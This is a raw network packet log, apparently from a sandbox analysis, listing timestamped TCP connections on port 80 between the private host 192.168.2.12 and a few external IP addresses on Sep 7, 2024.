                                                                                                                                                                    Sep 7, 2024 15:35:29.995568991 CEST4984780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:30.503662109 CEST4984880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:30.508625031 CEST804984888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:30.508759975 CEST4984880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:30.508872986 CEST4984880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:30.509392977 CEST4984980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:30.514056921 CEST804984888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:30.514126062 CEST4984880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:30.514245987 CEST8049849172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:30.514307022 CEST4984980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:30.524547100 CEST4984980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:30.529442072 CEST8049849172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.070664883 CEST8049849172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.070772886 CEST8049849172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.070784092 CEST8049849172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.070785046 CEST4984980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:31.070821047 CEST4984980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:31.070838928 CEST4984980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:31.196268082 CEST4985080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:31.201265097 CEST804985088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.201353073 CEST4985080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:31.212014914 CEST4985080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:31.212768078 CEST4985180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:31.216964960 CEST804985088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.217010021 CEST4985080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:31.217976093 CEST8049851172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.218046904 CEST4985180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:31.218151093 CEST4985180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:31.223218918 CEST8049851172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.879606962 CEST8049851172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.879853010 CEST4985180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:31.879868031 CEST8049851172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.879897118 CEST8049851172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:31.879931927 CEST4985180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:31.880026102 CEST4985180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:33.302237988 CEST4985280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:33.307315111 CEST804985245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:33.307391882 CEST4985280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:33.322190046 CEST4985280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:33.322768927 CEST4985380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:33.327737093 CEST804985245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:33.327804089 CEST4985280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:33.327883005 CEST8049853172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:33.327939987 CEST4985380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:33.328048944 CEST4985380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:33.333142042 CEST8049853172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:33.819684982 CEST8049853172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:33.819833994 CEST4985380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:33.819901943 CEST8049853172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:33.819977999 CEST4985380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:35.160878897 CEST4985480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:35.166490078 CEST804985464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:35.166563988 CEST4985480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:35.166657925 CEST4985480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:35.167193890 CEST4985580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:35.171920061 CEST804985464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:35.171978951 CEST4985480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:35.172122002 CEST8049855172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:35.172904968 CEST4985580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:35.173039913 CEST4985580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:35.178411961 CEST8049855172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:35.657118082 CEST8049855172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:35.657252073 CEST4985580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:35.657293081 CEST8049855172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:35.657342911 CEST4985580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:36.206311941 CEST4985680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:36.211117029 CEST804985688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:36.211199045 CEST4985680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:36.211273909 CEST4985680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:36.211774111 CEST4985780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:36.216490984 CEST804985688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:36.216542959 CEST4985680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:36.216686964 CEST8049857172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:36.216751099 CEST4985780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:36.227726936 CEST4985780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:36.232635975 CEST8049857172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:36.709125996 CEST8049857172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:36.709283113 CEST4985780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:36.709506035 CEST8049857172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:36.709558010 CEST4985780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:36.843005896 CEST4985980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:36.847925901 CEST804985964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:36.848016977 CEST4985980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:36.852674007 CEST4985980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:36.853421926 CEST4986080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:36.857795954 CEST804985964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:36.857884884 CEST4985980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:36.858740091 CEST8049860172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:36.858828068 CEST4986080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:36.858918905 CEST4986080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:36.864099979 CEST8049860172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:37.344141960 CEST8049860172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:37.344388008 CEST4986080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:37.345731974 CEST8049860172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:37.345782042 CEST4986080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:37.742351055 CEST4986180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:37.747467041 CEST804986188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:37.747570992 CEST4986180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:37.747663021 CEST4986180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:37.748200893 CEST4986280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:37.753074884 CEST804986188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:37.753155947 CEST4986180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:37.753308058 CEST8049862172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:37.753379107 CEST4986280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:37.753473043 CEST4986280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:37.758912086 CEST8049862172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:38.244913101 CEST8049862172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:38.245048046 CEST4986280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:38.246124029 CEST8049862172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:38.246177912 CEST4986280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:38.375467062 CEST4986380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:38.380558968 CEST804986364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:38.380630970 CEST4986380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:38.386061907 CEST4986380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:38.386574984 CEST4986480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:38.392843008 CEST804986364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:38.392916918 CEST4986380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:38.392981052 CEST8049864172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:38.393045902 CEST4986480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:38.393143892 CEST4986480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:38.399087906 CEST8049864172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:38.906603098 CEST8049864172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:38.906735897 CEST4986480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:38.906919956 CEST8049864172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:38.906970024 CEST4986480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:39.169171095 CEST4986580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:39.174170971 CEST804986588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:39.174243927 CEST4986580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:39.174316883 CEST4986580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:39.176279068 CEST4986680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:39.179397106 CEST804986588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:39.179461956 CEST4986580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:39.181555986 CEST8049866172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:39.181628942 CEST4986680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:39.182023048 CEST4986680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:39.186934948 CEST8049866172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:39.669457912 CEST8049866172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:39.669600964 CEST4986680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:39.669841051 CEST8049866172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:39.669893026 CEST4986680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:40.082159042 CEST4986780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:40.087213039 CEST804986764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:40.087296009 CEST4986780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:40.088433027 CEST4986780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:40.096559048 CEST4986880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:40.097989082 CEST804986764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:40.101902962 CEST8049868172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:40.101995945 CEST4986880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:40.102103949 CEST4986880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:40.102623940 CEST804986764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:40.102675915 CEST4986780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:40.107355118 CEST8049868172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:40.584737062 CEST8049868172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:40.584882021 CEST4986880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:40.585052013 CEST8049868172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:40.585108042 CEST4986880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:41.486072063 CEST4986980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:41.490972042 CEST804986988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:41.491075039 CEST4986980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:41.493230104 CEST4986980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:41.493788004 CEST4987080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:41.498155117 CEST804986988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:41.498239040 CEST4986980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:41.498606920 CEST8049870172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:41.498663902 CEST4987080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:41.498761892 CEST4987080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:41.503762007 CEST8049870172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:41.999269962 CEST8049870172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:41.999413013 CEST4987080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.004693985 CEST8049870172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:42.004755020 CEST4987080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.113066912 CEST4987180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.118217945 CEST804987145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:42.118308067 CEST4987180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.118408918 CEST4987180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.118882895 CEST4987280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.124660969 CEST804987145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:42.124679089 CEST8049872172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:42.124730110 CEST4987180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.124763012 CEST4987280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.124849081 CEST4987280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.129681110 CEST8049872172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:42.613513947 CEST8049872172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:42.613655090 CEST4987280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:42.613784075 CEST8049872172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:42.613832951 CEST4987280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:43.391541004 CEST4987380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:43.396681070 CEST804987364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.396784067 CEST4987380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:43.396903992 CEST4987380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:43.397406101 CEST4987480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:43.401814938 CEST804987364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.401917934 CEST804987364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.401967049 CEST4987380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:43.402683973 CEST8049874172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.402744055 CEST4987480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:43.415121078 CEST4987480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:43.420083046 CEST8049874172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.885535002 CEST8049874172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.885674953 CEST4987480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:43.886018991 CEST8049874172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.886074066 CEST4987480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:44.015516996 CEST4987580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:44.020711899 CEST804987588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:44.020778894 CEST4987580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:44.020929098 CEST4987580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:44.021487951 CEST4987680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:44.026355982 CEST804987588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:44.026405096 CEST4987580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:44.026667118 CEST8049876172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:44.026731968 CEST4987680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:44.040165901 CEST4987680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:44.045058012 CEST8049876172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:44.528086901 CEST8049876172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:44.528213978 CEST4987680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:44.528502941 CEST8049876172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:44.528543949 CEST4987680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:49.785501003 CEST6128880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:49.791255951 CEST806128845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.791321993 CEST6128880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:49.805762053 CEST6128880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:49.819068909 CEST806128845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.819122076 CEST6128880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:49.961205006 CEST6128980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:49.966082096 CEST806128988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.966145039 CEST6128980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:49.966229916 CEST6128980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:49.972035885 CEST806128988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.972104073 CEST6128980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:50.926060915 CEST6129080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:50.930885077 CEST806129045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:50.930974007 CEST6129080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:50.931029081 CEST6129080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:50.936278105 CEST806129045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:50.936336040 CEST6129080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.412338972 CEST6129180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.417165995 CEST806129145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.417232990 CEST6129180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.417296886 CEST6129180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.423279047 CEST806129145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.423329115 CEST6129180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.560110092 CEST6129280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:51.566987991 CEST806129264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.567069054 CEST6129280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:51.571659088 CEST6129280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:51.579056978 CEST806129264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.579123974 CEST6129280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:51.803870916 CEST6129380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.809012890 CEST806129345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.809098005 CEST6129380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.809195042 CEST6129380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.814393044 CEST806129345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.814471006 CEST6129380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.926323891 CEST6129480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.931431055 CEST806129445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.931499004 CEST6129480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.946420908 CEST6129480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:51.951374054 CEST806129445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.951430082 CEST6129480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:52.988590956 CEST6129580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:52.994447947 CEST806129545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:52.994537115 CEST6129580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:53.008867979 CEST6129580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:53.014931917 CEST806129545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:53.015014887 CEST6129580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:53.157186985 CEST6129680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:53.162074089 CEST806129664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:53.162168980 CEST6129680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:53.165117979 CEST6129680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:53.170070887 CEST806129664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:53.170144081 CEST6129680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:55.769423008 CEST5061280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:55.774367094 CEST805061264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:55.774463892 CEST5061280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:55.774708986 CEST5061280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:55.779649019 CEST805061264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:55.779752016 CEST5061280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:58.040050983 CEST5061380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:58.045087099 CEST805061364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:58.045190096 CEST5061380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:58.045248985 CEST5061380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:58.052968025 CEST805061364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:58.053064108 CEST5061380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:59.529161930 CEST5061480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:59.534013987 CEST805061488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:59.534091949 CEST5061480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:59.540139914 CEST5061480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:59.545058012 CEST805061488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:59.545136929 CEST5061480192.168.2.1288.198.29.97
